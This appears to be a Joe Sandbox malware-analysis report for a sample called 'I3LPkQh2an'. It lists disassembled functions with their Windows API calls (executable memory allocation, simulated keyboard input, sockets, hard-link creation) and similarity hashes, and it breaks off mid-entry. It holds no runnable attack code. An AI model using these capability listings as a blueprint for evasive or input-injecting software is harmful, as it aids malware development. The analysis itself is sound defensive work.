
Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754

Function 00441714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00441718
__swprintf.LIBCMT ref: 00441749

Strings

%.3d, xrefs: 00441723
WIN_XPe, xrefs: 00441788

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E

Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94

Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0047E0BE
CharLowerBuffW.USER32(?,?), ref: 0047E101

Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
_memmove.LIBCMT ref: 0047E314

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
Opcode Fuzzy Hash: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86

Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004780C3
CoUninitialize.OLE32 ref: 004780CE

Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4

VariantInit.OLEAUT32(?), ref: 004780D9
VariantClear.OLEAUT32(?), ref: 004783AA

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
Opcode Fuzzy Hash: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A

Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045688E
SysAllocString.OLEAUT32(00000000), ref: 00456937
VariantCopy.OLEAUT32 ref: 00456966
VariantClear.OLEAUT32(?), ref: 0045698D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
Opcode Fuzzy Hash: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D

Function 004897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C36F58,?), ref: 00489863
ScreenToClient.USER32(00000002,00000002), ref: 00489896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94

Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
WSAGetLastError.WSOCK32(00000000), ref: 004769E1

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
WSAGetLastError.WSOCK32(00000000), ref: 00476A51

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59

Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
_strlen.LIBCMT ref: 004764D9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 01455ef8c868b87f5fb28c9aef07a253f5b7e9d17fabbbc863442210fbad6251
Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
Opcode Fuzzy Hash: 01455ef8c868b87f5fb28c9aef07a253f5b7e9d17fabbbc863442210fbad6251
Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58

Function 0046B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99

Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F

Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048AB60
GetWindowRect.USER32(?,?), ref: 0048ABD6
PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
MessageBeep.USER32(00000000), ref: 0048AC57

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A

Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F

Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B

Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
__isleadbyte_l.LIBCMT ref: 00436229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754

Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00484F02

Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669

GetCaretPos.USER32(?), ref: 00484F13
ClientToScreen.USER32(00000000,?), ref: 00484F4E
GetForegroundWindow.USER32 ref: 00484F54

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5

Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetCursorPos.USER32(?), ref: 0048C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
GetCursorPos.USER32(?), ref: 0048C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
